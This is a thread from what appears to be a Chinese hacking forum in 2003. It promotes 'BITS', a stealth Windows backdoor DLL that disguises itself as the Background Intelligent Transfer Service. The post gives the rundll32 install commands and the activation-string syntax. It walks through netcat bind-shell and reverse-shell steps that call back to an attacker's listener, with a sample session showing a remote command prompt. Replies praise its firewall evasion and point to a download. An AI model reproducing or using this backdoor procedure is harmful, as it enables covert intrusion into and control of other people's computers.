|
 | 作者: wolfjin [wolfjin]
 论坛用户 |
登录 |
| BITS] 2003/09/16 BITS(Beat IT Security?),对商业的IT Security开始觉得厌倦了,So,Let's Beat IT Security :-)。 BITS其实是Background Intelligent Transfer Service的缩写,让我们暂时借用这个服务和名字吧,因为BITS是一个冒名顶替的后门,也可以在不知不觉中实现另一种意义的Background Intelligent Transfer Service。 这个后门是根据Bingle的关于svchost的原理写的,Thanks to Bingle。 特点: 进程管理器中看不到 平时没有端口,只是在系统中充当卧底的角色 提供正向连接和反向连接两种功能 仅适用于Windows2000/XP/2003 安装: 在Administrators的权限下或者LocalSystem下: rundll32.exe BITS.dll,Install <Active Strings> Active Strings是用户自己指定的一个特征字符串,用于激活BITS。 卸载: rundll32.exe BITS.dll,Uninstall 重启系统 通常情况下安装和卸载无论成功或者失败都不会有提示。 正向连接: 1、用nc连接目标主机的任何一个TCP端口(80/139/445.....) 2、按照以下格式输入激活命令 <Active Strings>@dancewithdolphin[xell]:<PORT> 例如,在安装的时候设定了Active Strings为BITS Door,将CMD绑定在端口99: BITS Door@dancewithdolphin[xell]:99 这样目标主机就会将CMD绑定在99。 3、连接目标主机的指定端口(上例中为99) 反向连接: 很多情况下主机是在防火墙后面的,这样就需要用反向连接。 1、在本地使用NC监听(如:nc -l -p 1234) 2、用nc连接目标主机的任何一个防火墙允许的TCP端口(80/139/445.....) 3、按照以下格式输入激活命令 <Active Strings>@dancewithdolphin[rxell]:<Your IP>:<Listen Port> 例如,在安装的时候设定了Active Strings为BITS Door,本机地址为1.1.1.1, nc在1234 端口监听: BITS Door@dancewithdolphin[rxell]:1.1.1.1:1234 4、目标主机的CMD将会出现在NC监听的端口1234。 注意:所有的输入都区分大小写。 Example: C:\My Documents>nc 219.237.63.199 139 securitystrings@dancewithdolphin[xell]:7 ? C:\My Documents>nc 219.237.63.199 7 �Microsoft Windows 2000 [Version 5.00.2195] (C) 版权所有 1985-2000 Microsoft Corp. C:\WINNT\system32> 如果没有成功,可以尝试在安装的时候使用: rundll32.exe BITS.dll,Install rasauto <Active Strings> |
| 地主 发表时间: 09/19 13:00 |
 | 回复: hacants [hacants] 论坛用户 |
登录 |
|
请发帖的哥们再说凄楚点。 这个作品好象很有用。 谢谢! |
| B1层 发表时间: 09/19 16:58 |
| 回复: wolfjin [wolfjin] 论坛用户 |
登录 |
|
是很有用,可以突破放火墙,在进程管理器中看不到,平时没有端口。 这还不够好?在小容网站有下载 |
| B2层 发表时间: 09/20 13:45 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 菜鸟乐园 标题: 小容的新作品